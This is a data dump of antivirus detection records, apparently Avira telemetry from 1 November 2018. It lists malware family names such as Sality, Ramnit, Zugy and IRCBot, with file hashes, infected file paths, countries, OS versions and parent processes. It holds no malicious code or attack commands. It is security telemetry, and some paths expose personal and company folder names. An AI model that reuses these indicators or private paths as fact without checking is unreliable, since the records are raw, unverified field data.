  Row(detection=Row(filename='avscan-20181101-154816-7395dd0a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-154816-7395DD0A', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:48:17Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155404-ae480b6e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155404-AE480B6E', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:54:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155031-8a4b8dfe', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155031-8A4B8DFE', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:50:32Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-154756-7040be9e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-154756-7040BE9E', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:47:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='trz7900.tmp', filepath='\\?\\C:\\Windows\\System32\\trz7900.tmp', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T01:10:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:25:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='jul0312.exe', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\Borong\\PAGI\\JUL0312\\JUL0312.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:21:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-154637-62fe21ce', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-154637-62FE21CE', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:46:38Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155827-da9e2ecc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155827-DA9E2ECC', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:58:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='oktober16.exe', filepath="D:\\DATA_SHARE\\dini\\D_Dini\\2017\\RPG GARMENT 2017\\DATA LAPORAN AUDIT\\TNA\\3. LAPORAN P2K3\\10. Oktober'16\\ANALISA SURAT DOKTER LOKAL3 & PABRIK\\LK.3\\OKTOBER16\\OKTOBER16.exe", filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:28:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='itb.exe', filepath='D:\\DATA_SHARE\\BU DWI\\Itb\\Itb.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:21:17Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='argent.dll', filepath='C:\\Program Files (x86)\\Shirl\\argent.dll', filesize=384000, name='HEUR/AGEN.1029347.#M1.#R1'), hash='054c0f8446a1a67cbb52839a10f2327ea80ac8320315d9de12d4e6677a8b902f', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-01T14:13:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='gaji audit 2017.bat', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2017\\RPG GARMENT 2017\\DATA LAPORAN AUDIT\\TAP GAJI AUDIT 2017\\GAJI AUDIT 2017.bat', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:28:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155339-aa116278', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155339-AA116278', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:53:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-10-27-21-48-58.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-20T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-01T21:32:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='$ranjgsi.exe', filepath='\\\\?\\L:\\$RECYCLE.BIN\\S-1-5-21-3357244247-2250698326-3409966804-1000\\$RANJGSI.exe', filesize=768000, name='TR/Dldr.Banload.Gen4.#M300.#R301211'), hash='bbeb7a757f7c702a01121892ad3dca3e29087602e928a614bc2f3095628942c8', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:14:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='u3.exe', filepath='E:\\u3.exe', filesize=320000, name='W32/Sality.AT.#M1.#R1'), hash='7532c882984b01eb25172808830a989e68219cb039b4f51da366b66de18296a6', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T05:26:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='vncutil.exe', filepath='\\\\computer_1\\f\\drivers\\audio\\realtek\\hda\\vncutil.exe', filesize=2560000, name='W32/Chir.B.#M1.#R1'), hash='ee80e0bcffe54883ecf7f5684ea3a412e75f934b442855a9b298e4a4c854f29a', metadata=Row(cmdline=None, country='PK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T13:47:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-171905-f03576c9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2909a85d\\AVSCAN-20181101-171341-D20DAD51\\AVSCAN-20181101-171905-F03576C9', filesize=1088000, name='Adware/Wajam.aib.#M1.#R1'), hash='ad834f39ca2de4a1dbf53ec217e7479e1b689ffbd2ac2f209257b7a437b4d971', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T16:19:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='apxkxtyquoc.dll', filepath='C:\\Windows\\Temp\\nsi83B7.tmp\\apXKXtYQUOC.dll', filesize=1152000, name='Adware/Zdengo.jplev.#M1.#R1'), hash='abd0bce4329be3cb4cdd15f863c7d30f3477d1f45065c27c9384482a6ae87134', metadata=Row(cmdline='\\\\\\/uac', country='CL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\CCleaner\\CCleaner64.exe', parentsize=19467544, timestamp='2018-11-01T01:39:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='sskinst.exe', filepath='C:\\Program Files (x86)\\Samsung\\Samsung SCX-3200 Series\\Setup\\Setup\\VECP\\VISTA_64\\sskinst.exe', filesize=192000, name='W32/Jeefo.A.#M1.#R1'), hash='d5c2fed42d0efd759af22fa10bdeddd99db42b5d13c863eb4cdf460a4378ad06', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:QY+R9uskg026bpWg.1', country='ZA', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-01T12:24:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='8fyjrj7tu.vir', filepath='\\\\?\\C:\\Program Files\\8FYJRJ7TUD\\8FYJRJ7TU.VIR', filesize=832000, name='TR/Dropper.Gen.#M300.#R4133'), hash='733e354c150b4149737ae67afd29dc8e971759219779881f1f0375c6118fb5b9', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T00:20:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='autmgr32.exe', filepath='D:\\Test_server_backup\\Public\\visual_studio_6.0Disk1\\OS\\SYSTEM\\AUTMGR32.EXE', filesize=192000, name='W32/Alman.BB.#M1.#R1'), hash='9f908a8fe65d1568416e7d0c1f3f39b7f3d014768bb74c9958900dde4b0f7ac1', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T12:43:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='atube_catcher_3419256383.exe', filepath='\\\\?\\C:\\Users\\X\\Downloads\\aTube_Catcher_3419256383.exe', filesize=2460000, name='PUA/InstallCore.#M1.#R1'), hash='62baa352039830f5fd30eb37497b849a646d678db29466333ac2a0c43fdda658', metadata=Row(cmdline=None, country='ES', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:39:56Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='c4764c8e6ae4e4314739df37720893e477a78d604f7dc20669f31faddc6e3542', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-32\\C4764C8E6AE4E4314739DF37720893E477A78D604F7DC20669F31FADDC6E3542', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='c4764c8e6ae4e4314739df37720893e477a78d604f7dc20669f31faddc6e3542', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T15:08:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='autmgr32.exe', filepath='D:\\Test_server_backup\\Public\\visual_studio_6.0Disk1\\OS\\SYSTEM\\AUTMGR32.EXE', filesize=192000, name='W32/Alman.BB.#M1.#R1'), hash='9f908a8fe65d1568416e7d0c1f3f39b7f3d014768bb74c9958900dde4b0f7ac1', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:47:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='rapat 6.exe', filepath='I:\\PPKD\\Rapat 6\\Rapat 6.exe', filesize=768000, name='TR/Dropper.Gen.#M300.#R3740'), hash='d1a821971ed8642d258ee65db27b91fddd28d902f9ec4e17322a39ee7beb6b5d', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-01T02:23:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='9eeb27c6071610675bff9121e2259c1780bdc8ab9f92ca532ec1ca22d4a9a308', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 30.10.2018-31\\9EEB27C6071610675BFF9121E2259C1780BDC8AB9F92CA532EC1CA22D4A9A308', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='9eeb27c6071610675bff9121e2259c1780bdc8ab9f92ca532ec1ca22d4a9a308', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:08:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='gplot.exe', filepath='D:\\the lasted software\\ANSYS process\\ANSYS Inc\\v120\\icemcfd\\win64_amd\\bin\\gplot.exe', filesize=384000, name='W32/Ramnit.CD.#M1.#R1'), hash='c401e13e7cadebbb2643eee40e9265fda2d2dc576841233596966f26a6f24ec4', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe', parentsize=467408, timestamp='2018-11-01T12:22:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-110253-bd77200a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-110253-BD77200A', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:02:38Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-215837-49b215a1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c4e693d0\\AVSCAN-20181101-215241-1C39608E\\AVSCAN-20181101-215837-49B215A1', filesize=788000, name='PUA/DNSBlock.#M1.#R1'), hash='6fed83ce7f539d48185dc7329823f199c509f9c04401cdfb82b83140f4bf74f6', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T20:58:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='apxkxtyquoc.dll', filepath='C:\\Windows\\Temp\\nsi83B7.tmp\\apXKXtYQUOC.dll', filesize=1152000, name='Adware/Zdengo.jplev.#M1.#R1'), hash='abd0bce4329be3cb4cdd15f863c7d30f3477d1f45065c27c9384482a6ae87134', metadata=Row(cmdline='\\\\\\/MONITOR \\\\\\/uac', country='CL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\CCleaner\\CCleaner64.exe', parentsize=19467544, timestamp='2018-11-01T18:06:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-112207-4efdaae4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-112207-4EFDAAE4', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:21:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wuauserv.exe', filepath='C:\\Windows\\SysWOW64\\drivers\\UMDF\\tr-KL\\wuauserv.exe', filesize=448000, name='W32/Hlubea.Z.#M1.#R1'), hash='927986f56707e3dfe2adca5e4224417a764405e155f4ac1e60ddf7b6085c8c2c', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T23:48:17Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-111047-f9415237', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-111047-F9415237', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:10:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='csrss.exe', filepath='C:\\ProgramData\\Microsoft\\WmiAppSrv\\csrss.exe', filesize=1344000, name='TR/Crypt.FKM.Gen.#M300.#R581'), hash='6f85c3cad16c4f9e490f240c57448bdd12310c0bc11f4f9231440daefe81237e', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Elex-tech\\YAC\\iSafeSvc2.exe', parentsize=131024, timestamp='2018-11-01T01:06:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='sdclt.exe', filepath='H:\\SDCLT.EXE', filesize=128000, name='W32/Sality.AT.#M1.#R1'), hash='66c799f4772ee3a7ff59b13e76bd32994490b66034d5798a5d627b450a77212e', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\Baidu Security\\Baidu Antivirus\\5.4.3.124234.0\\BAVSvc.exe', parentsize=2572928, timestamp='2018-11-01T15:25:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-140244-da3cf05b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_63ecec90\\AVSCAN-20181101-140153-D28152AC\\AVSCAN-20181101-140244-DA3CF05B', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:02:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msimg32.dll', filepath='D:\\!Letöltések\\Setup (1)\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='HU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='D:\\!Letöltések\\Setup (1)\\Setup.exe', parentsize=1551000, timestamp='2018-11-01T16:42:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-153214-c0d530e7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8d0ae1ea\\AVSCAN-20181101-153133-B880DF53\\AVSCAN-20181101-153214-C0D530E7', filesize=2048000, name='TR/Agent.qhhxz.#M1.#R1'), hash='6e4de412fb1dbf07c9133c38f9329dab3a1c3e68df9284693ff33064794cad97', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T14:32:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T11:33:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='updater_zip_res2017042888uu_new[1].exe', filepath='\\\\?\\C:\\Windows\\SysWOW64\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\Updater_zip_res2017042888uu_new[1].exe', filesize=576000, name='HEUR/AGEN.1030714.#M1.#R1'), hash='2d9bffb5b2cd0a3d0251d753856f11d6b3fc6a26eedd17c9bbbefe52eafce55b', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T04:09:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-121220-451cecbf', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3e10a241\\AVSCAN-20181101-114643-5C69BAFD\\AVSCAN-20181101-121220-451CECBF', filesize=868000, name='PUA/InstallCore.diur.#M1.#R1'), hash='84d7e3002f493009aa0ef9fbb334b621d382adeb1450d73fedf867f7f6e63ee4', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:12:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-003116-719a42d0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8b7397db\\AVSCAN-20181102-001743-196A0AE8\\AVSCAN-20181102-003116-719A42D0', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:31:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='autorun.exe', filepath='d:\\autorun.exe', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='CH', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-01T18:29:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-123344-56728598', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8887483e\\AVSCAN-20181101-123308-5173CCAC\\AVSCAN-20181101-123344-56728598', filesize=256000, name='TR/Dropper.Gen.#M1.#R1'), hash='216d36a242cafd0951935727d497baeffb715f17f5c665a9f89073814a7f4a0c', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T09:33:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\Downloads\\Setup\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\Downloads\\Setup\\Setup.exe', parentsize=1551000, timestamp='2018-11-01T17:43:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='fr.exe', filepath='F:\\New folder\\Corel Draw 12\\Apple\\FR\\FR.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline='rtp', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\SMADAV\\SMΔRTP.exe', parentsize=1613824, timestamp='2018-11-01T17:18:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-175748-82f2b6ce', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_69a2b8c4\\AVSCAN-20181101-175732-7FF8E221\\AVSCAN-20181101-175748-82F2B6CE', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:57:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tqipumsmu20xl0l.exe', filepath='\\\\?\\C:\\Program Files (x86)\\ygn1ku2lzbx\\TQIPUMSMU20XL0L.exe', filesize=192000, name='TR/Dropper.Gen.#M300.#R4133'), hash='7e9a1e14fc752e1248e08fe96dfdcab7cd3fc9f568b000813f0c527348a86140', metadata=Row(cmdline=None, country='KE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:09:32Z'), dt=datetime.date(2018, 11, 1)),
